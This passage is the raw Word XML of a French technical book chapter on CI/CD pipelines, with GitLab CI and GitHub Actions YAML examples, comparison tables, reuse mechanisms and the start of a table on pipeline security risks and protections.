          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Échec si absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Reconstruction lente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tâche bloquée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux usages distincts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Clé de cache qui change avec le fichier de verrouillage</w:t>
        <w:br/>
        <w:t>- uses: actions/cache@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">  with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    path: ~/.npm</w:t>
        <w:br/>
        <w:t xml:space="preserve">    key: npm-${{ runner.os }}-${{ hashFiles('package-lock.json') }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    restore-keys: |</w:t>
        <w:br/>
        <w:t xml:space="preserve">      npm-${{ runner.os }}-</w:t>
        <w:br/>
        <w:br/>
        <w:t># Récupérer un artefact dans une autre tâche</w:t>
        <w:br/>
        <w:t>- uses: actions/download-artifact@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">  with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    name: paquet</w:t>
        <w:br/>
        <w:t xml:space="preserve">    path: dist/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>79.4 GitLab CI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GitLab CI décrit des étapes dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.gitlab-ci.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Les tâches sont des jobs, regroupés en stages exécutés dans l'ordre. Les runners sont fournis par l'instance ou par l'organisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un pipeline GitLab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stages: [lint, test, build, deploy]</w:t>
        <w:br/>
        <w:br/>
        <w:t>variables:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  NODE_VERSION: "22"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  npm_config_cache: "$CI_PROJECT_DIR/.npm"</w:t>
        <w:br/>
        <w:br/>
        <w:t>default:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  image: node:22-alpine</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cache:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    key:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      files: [package-lock.json]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    paths: [.npm/]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  before_script:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - npm ci --prefer-offline</w:t>
        <w:br/>
        <w:br/>
        <w:t>lint:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  stage: lint</w:t>
        <w:br/>
        <w:t xml:space="preserve">  script:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - npm run lint</w:t>
        <w:br/>
        <w:br/>
        <w:t>test:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  stage: test</w:t>
        <w:br/>
        <w:t xml:space="preserve">  script:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - npm test -- --coverage</w:t>
        <w:br/>
        <w:t xml:space="preserve">  coverage: '/All files[^|]*\|\s+([\d.]+)/'</w:t>
        <w:br/>
        <w:t xml:space="preserve">  artifacts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    when: always</w:t>
        <w:br/>
        <w:t xml:space="preserve">    reports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      junit: rapports/junit.xml</w:t>
        <w:br/>
        <w:t xml:space="preserve">      coverage_report:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        coverage_format: cobertura</w:t>
        <w:br/>
        <w:t xml:space="preserve">        path: rapports/coverage.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.301 — Sept équivalences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Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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GitHub Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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GitLab CI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Unité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Workflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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Tâche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Étape interne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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Ordonnancement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>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needs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>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stages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Modèle réutilisable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Reusable workflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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Runner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>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runs-on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>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tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variables protégées</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LE PIPELINE DOIT ÊTRE LISIBLE SANS DOCUMENTATION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un lecteur qui découvre le dépôt doit comprendre en une minute ce qui est vérifié, dans quel ordre, et ce qui part en production. Les noms de tâches et les commentaires servent à cela, pas la syntaxe exotique.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>79.5 Réutiliser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La duplication de pipelines produit des divergences silencieuses. Les deux forges offrent des mécanismes de composition, à utiliser avant de copier un fichier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un workflow réutilisable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.github/workflows/ci.yml</w:t>
        <w:br/>
        <w:t>jobs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  appel:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    uses: ./.github/workflows/tests.yml</w:t>
        <w:br/>
        <w:t xml:space="preserve">    with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      node: 22</w:t>
        <w:br/>
        <w:t xml:space="preserve">    secrets: inherit</w:t>
        <w:br/>
        <w:br/>
        <w:t># .github/workflows/tests.yml</w:t>
        <w:br/>
        <w:t>on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  workflow_call:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    inputs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      node:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        type: number</w:t>
        <w:br/>
        <w:t xml:space="preserve">        required: true</w:t>
        <w:br/>
        <w:br/>
        <w:t>jobs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  test:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    runs-on: ubuntu-24.04</w:t>
        <w:br/>
        <w:t xml:space="preserve">    steps:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: actions/checkout@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: actions/setup-node@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">        with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          node-version: ${{ inputs.node }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - run: npm ci &amp;&amp; npm test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une composition GitLab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.gitlab-ci.yml — composition par include</w:t>
        <w:br/>
        <w:t>include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - local: .gitlab/ci/tests.yml</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - template: Security/SAST.gitlab-ci.yml</w:t>
        <w:br/>
        <w:br/>
        <w:t># .gitlab/ci/tests.yml</w:t>
        <w:br/>
        <w:t>.test-template: &amp;test</w:t>
        <w:br/>
        <w:t xml:space="preserve">  stage: test</w:t>
        <w:br/>
        <w:t xml:space="preserve">  script:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - npm test</w:t>
        <w:br/>
        <w:br/>
        <w:t>test:node22:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;&lt;: *test</w:t>
        <w:br/>
        <w:t xml:space="preserve">  image: node:22-alpine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.302 — Quatre besoins de réutilisation</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Besoin</w:t>
            </w:r>
          </w:p>
        </w:tc>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Solution GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>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Solution GitLab</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Logique commune</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Workflow réutilisable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Petites étapes</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Action composite</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before_script</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Configuration d'équipe</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Repository rules</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CI/CD components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Modèle officiel</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Marketplace</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Templates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>79.6 Sécurité du pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un pipeline exécute du code arbitraire avec des secrets. Chaque déclencheur supplémentaire est une surface d'attaque supplémentaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.303 — Cinq risques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4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Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="339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Scénario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2743"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fuite de secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3397"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Script d'une demande de fusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>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Secrets indisponibles sur </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pull_request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="274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Action compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="339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Étiquette mobile détournée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Épinglage par empreinte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
